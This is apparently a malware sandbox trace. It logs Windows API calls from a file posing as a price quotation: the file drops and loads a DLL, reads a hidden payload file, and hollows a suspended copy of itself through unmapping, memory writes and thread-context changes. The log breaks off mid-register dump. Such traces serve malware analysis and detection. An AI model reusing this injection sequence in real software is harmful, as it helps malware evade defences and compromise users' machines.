0xffffffff [0097.243] CreateFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp\\akepwc.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nspcdfe.tmp\\akepwc.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0097.243] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=249386, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3ce2a [0097.243] ReadFile (in: hFile=0x1f8, lpBuffer=0x19f798, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x19f798*, lpNumberOfBytesRead=0x19f71c*=0x4, lpOverlapped=0x0) returned 1 [0097.244] GetTickCount () returned 0x1b9ce5b [0097.244] ReadFile (in: hFile=0x1f8, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0097.245] GetTickCount () returned 0x1b9ce5b [0097.245] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x8000, lpOverlapped=0x0) returned 1 [0097.247] GetTickCount () returned 0x1b9ce5b [0097.247] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x3547, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x3547, lpOverlapped=0x0) returned 1 [0097.248] GetTickCount () returned 0x1b9ce5b [0097.248] ReadFile (in: hFile=0x1f8, lpBuffer=0x414c48, nNumberOfBytesToRead=0x537, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x537, lpOverlapped=0x0) returned 1 [0097.248] GetTickCount () returned 0x1b9ce5b [0097.248] MulDiv (nNumber=17719, nNumerator=100, nDenominator=17719) returned 100 [0097.248] wsprintfA (in: param_1=0x19f72c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0097.248] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x6b9, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x6b9, lpOverlapped=0x0) returned 1 [0097.248] CloseHandle (hObject=0x28) returned 1 [0097.251] lstrcpynA (in: lpString1=0x42dbc0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp" [0097.251] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp") returned 48 [0097.251] lstrcpynA (in: lpString1=0x40a040, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp\\akepwc.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp\\akepwc.dll") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp\\akepwc.dll" [0097.251] lstrcpynA (in: lpString1=0x409c40, lpString2="TclpOwkq", iMaxLength=1024 | out: lpString1="TclpOwkq") returned="TclpOwkq" [0097.251] GetModuleHandleA (lpModuleName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp\\akepwc.dll") returned 0x0 [0097.253] LoadLibraryExA (lpLibFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp\\akepwc.dll", hFile=0x0, dwFlags=0x8) returned 0x6c3c0000 [0098.729] GetProcAddress (hModule=0x6c3c0000, lpProcName="TclpOwkq") returned 0x6c3c7500 [0098.730] VirtualAlloc (lpAddress=0x0, dwSize=0xbebc200, flAllocationType=0x3000, flProtect=0x4) returned 0x27a0000 [0103.862] EnumResourceTypesA (hModule=0x0, lpEnumFunc=0x6c3ca000, lParam=0x0) [0103.865] LoadLibraryW (lpLibFileName="Shlwapi.dll") returned 0x76f60000 [0103.865] GetTempPathW (in: nBufferLength=0x103, lpBuffer=0x19f1c8 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0103.866] PathAppendW (in: pszPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", pMore="4gyujazywsbdaoe" | out: pszPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\4gyujazywsbdaoe") returned 1 [0103.866] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\4gyujazywsbdaoe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\4gyujazywsbdaoe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0103.867] GetFileSize (in: hFile=0x230, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x34f32 [0103.867] VirtualAlloc (lpAddress=0x0, dwSize=0x34f32, flAllocationType=0x3000, flProtect=0x4) returned 0x2200000 [0103.877] ReadFile (in: hFile=0x230, lpBuffer=0x2200000, nNumberOfBytesToRead=0x34f32, lpNumberOfBytesRead=0x19f5d8, lpOverlapped=0x0 | out: lpBuffer=0x2200000*, lpNumberOfBytesRead=0x19f5d8*=0x34f32, lpOverlapped=0x0) returned 1 [0103.882] CloseHandle (hObject=0x230) returned 1 [0103.902] LoadLibraryW (lpLibFileName="ntdll.dll") returned 0x77260000 [0103.903] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19eccc, nSize=0x103 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\price_request_quotation.exe")) returned 0x39 [0103.903] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19e548, nSize=0x103 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\price_request_quotation.exe")) returned 0x39 [0103.904] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe\" " [0103.904] CreateProcessW (in: lpApplicationName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe", lpCommandLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19ec24*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19ec88 | out: lpCommandLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe\" ", lpProcessInformation=0x19ec88*(hProcess=0x234, hThread=0x230, dwProcessId=0x68c, dwThreadId=0x7ac)) returned 1 [0103.942] GetThreadContext (in: hThread=0x230, lpContext=0x19e958 | out: lpContext=0x19e958*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x7729a1fe, Dr2=0x19e9bc, Dr3=0x19ea58, Dr6=0x7a0, Dr7=0x1a1e44, FloatSave.ControlWord=0x40b193ab, FloatSave.StatusWord=0xe919c6ed, FloatSave.TagWord=0x19ec8c, FloatSave.ErrorOffset=0x57, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x1a1714, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x78, [1]=0xe9, [2]=0x19, [3]=0x0, [4]=0x7e, [5]=0xc4, [6]=0xc1, [7]=0xf5, [8]=0xac, [9]=0xee, [10]=0x19, [11]=0x0, [12]=0x30, [13]=0xee, [14]=0x2d, [15]=0x77, [16]=0x3d, [17]=0xf, [18]=0x35, [19]=0x9e, [20]=0xfe, [21]=0xff, [22]=0xff, [23]=0xff, [24]=0x34, [25]=0xec, [26]=0x19, [27]=0x0, [28]=0x98, [29]=0x8d, [30]=0x29, [31]=0x77, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x25, [37]=0x2, [38]=0x0, [39]=0xc0, [40]=0x78, [41]=0xec, [42]=0x19, [43]=0x0, [44]=0x10, [45]=0x7, [46]=0x71, [47]=0x0, [48]=0xad, [49]=0x8d, [50]=0x29, [51]=0x77, [52]=0x20, [53]=0xea, [54]=0x19, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x88, [69]=0x2e, [70]=0x6e, [71]=0x0, [72]=0x9, [73]=0x1, [74]=0x1, [75]=0x1, [76]=0xc4, [77]=0x2e, [78]=0x6e, [79]=0x0), FloatSave.Cr0NpxState=0xf46857d4, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x327000, Edx=0x0, Ecx=0x0, Eax=0x40312a, Ebp=0x0, Eip=0x772d8fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25, [5]=0x2, [6]=0x0, [7]=0xc0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x48, [13]=0xea, [14]=0x19, [15]=0x0, [16]=0x2b, [17]=0xba, [18]=0x29, [19]=0x77, [20]=0xd0, [21]=0xea, [22]=0x19, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x9, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x98, [37]=0xea, [38]=0x19, [39]=0x0, [40]=0x33, [41]=0xb8, [42]=0x29, [43]=0x77, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x59, [49]=0xb8, [50]=0x29, [51]=0x77, [52]=0xdd, [53]=0xc5, [54]=0x19, [55]=0xe9, [56]=0x10, [57]=0xec, [58]=0x19, [59]=0x0, [60]=0xa0, [61]=0xec, [62]=0x19, [63]=0x0, [64]=0x8, [65]=0xec, [66]=0x19, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x94, [73]=0xea, [74]=0x19, [75]=0x0, [76]=0xd0, [77]=0xea, [78]=0x19, [79]=0x0, [80]=0x10, [81]=0xec, [82]=0x19, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0xd8, [89]=0xea, [90]=0x19, [91]=0x0, [92]=0x58, [93]=0xea, [94]=0x19, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x1c, [101]=0xf7, [102]=0x19, [103]=0x0, [104]=0x30, [105]=0xee, [106]=0x2d, [107]=0x77, [108]=0x6d, [109]=0xe, [110]=0x35, [111]=0x9e, [112]=0xfe, [113]=0xff, [114]=0xff, [115]=0xff, [116]=0x59, [117]=0xb8, [118]=0x29, [119]=0x77, [120]=0x9e, [121]=0x1, [122]=0x2a, [123]=0x77, [124]=0x20, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x4, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x8, [141]=0xec, [142]=0x19, [143]=0x0, [144]=0xcc, [145]=0xea, [146]=0x19, [147]=0x0, [148]=0x1, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0xa0, [153]=0xec, [154]=0x19, [155]=0x0, [156]=0xc0, [157]=0x1, [158]=0x2a, [159]=0x77, [160]=0x39, [161]=0xc5, [162]=0x19, [163]=0xe9, [164]=0x20, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x12, [173]=0x0, [174]=0x0, [175]=0x1, [176]=0xd8, [177]=0xea, [178]=0x19, [179]=0x0, [180]=0x6e, [181]=0x0, [182]=0x74, [183]=0x0, [184]=0x64, [185]=0x0, [186]=0x6c, [187]=0x0, [188]=0x6c, [189]=0x0, [190]=0x2e, [191]=0x0, [192]=0x64, [193]=0x0, [194]=0x6c, [195]=0x0, [196]=0x6c, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0xa3, [205]=0x97, [206]=0x29, [207]=0x77, [208]=0x2, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x40, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0xe4, [277]=0xeb, [278]=0x19, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x16, [285]=0x0, [286]=0x18, [287]=0x0, [288]=0x24, [289]=0xf6, [290]=0x19, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0xe0, [297]=0xeb, [298]=0x19, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0xe8, [313]=0xf1, [314]=0x19, [315]=0x0, [316]=0x10, [317]=0x7, [318]=0x71, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x2, [327]=0x0, [328]=0x80, [329]=0xeb, [330]=0x19, [331]=0x0, [332]=0x80, [333]=0xeb, [334]=0x19, [335]=0x0, [336]=0x80, [337]=0xeb, [338]=0x19, [339]=0x0, [340]=0x2, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x2, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x19, [351]=0x0, [352]=0xc9, [353]=0xc4, [354]=0x19, [355]=0xe9, [356]=0x4, [357]=0xed, [358]=0x19, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0xb5, [365]=0x93, [366]=0x29, [367]=0x77, [368]=0x2c, [369]=0xec, [370]=0x19, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x2c, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0xa0, [381]=0xf1, [382]=0x19, [383]=0x0, [384]=0x24, [385]=0xf6, [386]=0x19, [387]=0x0, [388]=0x30, [389]=0x94, [390]=0x29, [391]=0x77, [392]=0xa8, [393]=0xef, [394]=0x19, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x1, [400]=0x16, [401]=0x0, [402]=0x18, [403]=0x0, [404]=0x24, [405]=0xf6, [406]=0x19, [407]=0x0, [408]=0xd4, [409]=0xeb, [410]=0x19, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x29, [415]=0x77, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x64, [425]=0xf1, [426]=0x19, [427]=0x0, [428]=0x9c, [429]=0xb7, [430]=0x29, [431]=0x77, [432]=0x10, [433]=0xec, [434]=0x19, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x81, [441]=0xc5, [442]=0x19, [443]=0xe9, [444]=0x1, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x68, [449]=0xec, [450]=0x19, [451]=0x0, [452]=0x1, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0xcd, [465]=0x35, [466]=0x2a, [467]=0x77, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x9, [477]=0x36, [478]=0x2a, [479]=0x77, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x88, [485]=0x2e, [486]=0x6e, [487]=0x0, [488]=0x94, [489]=0xec, [490]=0x19, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x64, [505]=0xf1, [506]=0x19, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0103.969] ReadProcessMemory (in: hProcess=0x234, lpBaseAddress=0x327008, lpBuffer=0x19ec9c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x19ec9c*, lpNumberOfBytesRead=0x0) returned 1 [0103.969] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19e510 | out: Wow64Process=0x19e510*=1) returned 1 [0103.970] lstrlenW (lpString="PRICE_REQUEST_QUOTATION.exe") returned 27 [0103.970] lstrlenW (lpString="ntdll.dll") returned 9 [0103.970] lstrlenW (lpString="ntdll.dll") returned 9 [0103.970] lstrlenW (lpString="ntdll.dll") returned 9 [0103.970] lstrlenW (lpString="ntdll.dll") returned 9 [0103.970] lstrlenW (lpString="tdll.dll") returned 8 [0103.970] lstrlenW (lpString="dll.dll") returned 7 [0103.970] lstrlenW (lpString="ll.dll") returned 6 [0103.970] lstrlenW (lpString="l.dll") returned 5 [0103.970] lstrlenW (lpString=".dll") returned 4 [0103.970] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x23c [0103.971] GetFileSize (in: hFile=0x23c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0103.971] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0xe660000 [0103.972] ReadFile (in: hFile=0x23c, lpBuffer=0xe660000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19e4e4, lpOverlapped=0x0 | out: lpBuffer=0xe660000*, lpNumberOfBytesRead=0x19e4e4*=0x1784a0, lpOverlapped=0x0) returned 1 [0104.060] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0xe7e0000 [0104.100] CloseHandle (hObject=0x23c) returned 1 [0104.100] VirtualFree (lpAddress=0xe660000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.110] VirtualFree (lpAddress=0xe7e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.127] NtUnmapViewOfSection (ProcessHandle=0x234, BaseAddress=0x400000) returned 0x0 [0104.130] VirtualAllocEx (hProcess=0x234, lpAddress=0x400000, dwSize=0x29000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0104.134] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19e4e0 | out: Wow64Process=0x19e4e0*=1) returned 1 [0104.135] lstrlenW (lpString="PRICE_REQUEST_QUOTATION.exe") returned 27 [0104.135] lstrlenW (lpString="ntdll.dll") returned 9 [0104.135] lstrlenW (lpString="ntdll.dll") returned 9 [0104.135] lstrlenW (lpString="ntdll.dll") returned 9 [0104.135] lstrlenW (lpString="ntdll.dll") returned 9 [0104.135] lstrlenW (lpString="tdll.dll") returned 8 [0104.135] lstrlenW (lpString="dll.dll") returned 7 [0104.135] lstrlenW (lpString="ll.dll") returned 6 [0104.135] lstrlenW (lpString="l.dll") returned 5 [0104.135] lstrlenW (lpString=".dll") returned 4 [0104.135] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x23c [0104.136] GetFileSize (in: hFile=0x23c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0104.136] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0xe660000 [0104.136] ReadFile (in: hFile=0x23c, lpBuffer=0xe660000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19e4b4, lpOverlapped=0x0 | out: lpBuffer=0xe660000*, lpNumberOfBytesRead=0x19e4b4*=0x1784a0, lpOverlapped=0x0) returned 1 [0104.177] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0xe7e0000 [0104.211] CloseHandle (hObject=0x23c) returned 1 [0104.211] VirtualFree (lpAddress=0xe660000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.222] VirtualFree (lpAddress=0xe7e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.229] NtWriteVirtualMemory (in: ProcessHandle=0x234, BaseAddress=0x400000, Buffer=0x2200000*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x19e514 | out: Buffer=0x2200000*, NumberOfBytesWritten=0x19e514*=0x200) returned 0x0 [0104.254] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19e4e0 | out: Wow64Process=0x19e4e0*=1) returned 1 [0104.254] lstrlenW (lpString="PRICE_REQUEST_QUOTATION.exe") returned 27 [0104.254] lstrlenW (lpString="ntdll.dll") returned 9 [0104.254] lstrlenW (lpString="ntdll.dll") returned 9 [0104.254] lstrlenW (lpString="ntdll.dll") returned 9 [0104.254] lstrlenW (lpString="ntdll.dll") returned 9 [0104.254] lstrlenW (lpString="tdll.dll") returned 8 [0104.254] lstrlenW (lpString="dll.dll") returned 7 [0104.254] lstrlenW (lpString="ll.dll") returned 6 [0104.254] lstrlenW (lpString="l.dll") returned 5 [0104.254] lstrlenW (lpString=".dll") returned 4 [0104.254] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x23c [0104.255] GetFileSize (in: hFile=0x23c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0104.255] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0xe660000 [0104.255] ReadFile (in: hFile=0x23c, lpBuffer=0xe660000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19e4b4, lpOverlapped=0x0 | out: lpBuffer=0xe660000*, lpNumberOfBytesRead=0x19e4b4*=0x1784a0, lpOverlapped=0x0) returned 1 [0104.278] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0xe7e0000 [0104.309] CloseHandle (hObject=0x23c) returned 1 [0104.310] VirtualFree (lpAddress=0xe660000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.318] VirtualFree (lpAddress=0xe7e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.325] NtWriteVirtualMemory (in: ProcessHandle=0x234, BaseAddress=0x401000, Buffer=0x2201000*, NumberOfBytesToWrite=0x27c00, NumberOfBytesWritten=0x19e514 | out: Buffer=0x2201000*, NumberOfBytesWritten=0x19e514*=0x27c00) returned 0x0 [0104.362] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19e4e0 | out: Wow64Process=0x19e4e0*=1) returned 1 [0104.362] lstrlenW (lpString="PRICE_REQUEST_QUOTATION.exe") returned 27 [0104.362] lstrlenW (lpString="ntdll.dll") returned 9 [0104.362] lstrlenW (lpString="ntdll.dll") returned 9 [0104.362] lstrlenW (lpString="ntdll.dll") returned 9 [0104.362] lstrlenW (lpString="ntdll.dll") returned 9 [0104.362] lstrlenW (lpString="tdll.dll") returned 8 [0104.362] lstrlenW (lpString="dll.dll") returned 7 [0104.362] lstrlenW (lpString="ll.dll") returned 6 [0104.362] lstrlenW (lpString="l.dll") returned 5 [0104.362] lstrlenW (lpString=".dll") returned 4 [0104.362] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x23c [0104.363] GetFileSize (in: hFile=0x23c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0104.363] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0xe660000 [0104.363] ReadFile (in: hFile=0x23c, lpBuffer=0xe660000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19e4b4, lpOverlapped=0x0 | out: lpBuffer=0xe660000*, lpNumberOfBytesRead=0x19e4b4*=0x1784a0, lpOverlapped=0x0) returned 1 [0104.387] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0xe7e0000 [0104.414] CloseHandle (hObject=0x23c) returned 1 [0104.414] VirtualFree (lpAddress=0xe660000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.420] VirtualFree (lpAddress=0xe7e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.634] NtWriteVirtualMemory (in: ProcessHandle=0x234, BaseAddress=0x327008, Buffer=0x19ecb0*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x19e514 | out: Buffer=0x19ecb0*, NumberOfBytesWritten=0x19e514*=0x4) returned 0x0 [0104.650] SetThreadContext (hThread=0x230, lpContext=0x19e958*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x7729a1fe, Dr2=0x19e9bc, Dr3=0x19ea58, Dr6=0x7a0, Dr7=0x1a1e44, FloatSave.ControlWord=0x40b193ab, FloatSave.StatusWord=0xe919c6ed, FloatSave.TagWord=0x19ec8c, FloatSave.ErrorOffset=0x57, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x1a1714, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x78, [1]=0xe9, [2]=0x19, [3]=0x0, [4]=0x7e, [5]=0xc4, [6]=0xc1, [7]=0xf5, [8]=0xac, [9]=0xee, [10]=0x19, [11]=0x0, [12]=0x30, [13]=0xee, [14]=0x2d, [15]=0x77, [16]=0x3d, [17]=0xf, [18]=0x35, [19]=0x9e, [20]=0xfe, [21]=0xff, [22]=0xff, [23]=0xff, [24]=0x34, [25]=0xec, [26]=0x19, [27]=0x0, [28]=0x98, [29]=0x8d, [30]=0x29, [31]=0x77, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x25, [37]=0x2, [38]=0x0, [39]=0xc0, [40]=0x78, [41]=0xec, [42]=0x19, [43]=0x0, [44]=0x10, [45]=0x7, [46]=0x71, [47]=0x0, [48]=0xad, [49]=0x8d, [50]=0x29, [51]=0x77, [52]=0x20, [53]=0xea, [54]=0x19, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x88, [69]=0x2e, 